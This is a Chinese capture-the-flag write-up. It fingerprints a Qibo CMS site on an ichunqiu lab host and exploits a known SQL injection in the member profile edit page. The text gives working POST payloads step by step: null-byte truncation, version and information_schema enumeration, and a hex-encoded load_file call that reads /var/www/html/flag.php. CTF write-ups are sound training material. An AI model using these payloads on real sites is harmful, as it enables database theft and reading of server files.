1 信息收集
拿到CMS搭的站, 首先需要确定网站使用的是何种CMS,百度得到该CMS为齐博CMS的整站系统:http://v7.qibosoft.com/
image
接下来,收集信息,该CMS出现过哪些漏洞:
2 漏洞利用
简而言之,治理在修改信息时,有一个SQL注入漏洞。
接下来,我根据大佬的描述,写payload,利用这个漏洞:
0- 注册用户,记一下uid和email
1-报错测试:
url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
# email 为注册时的email
POST:
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=
image
2-加上注入语句
url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST data:
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid= , address=(select version()) where uid = 3 %23
image
3-查表:
POSTdata:
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23
image
4-查列名
POSTdata:
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=
, address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23
image
但是没有直接的flag,只能考虑利用load_file
5-payload
扫描一下发现,网站更目录下,有一个flag.php
image
load_file函数读取这个文件:/var/www/html/flag.php
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23
image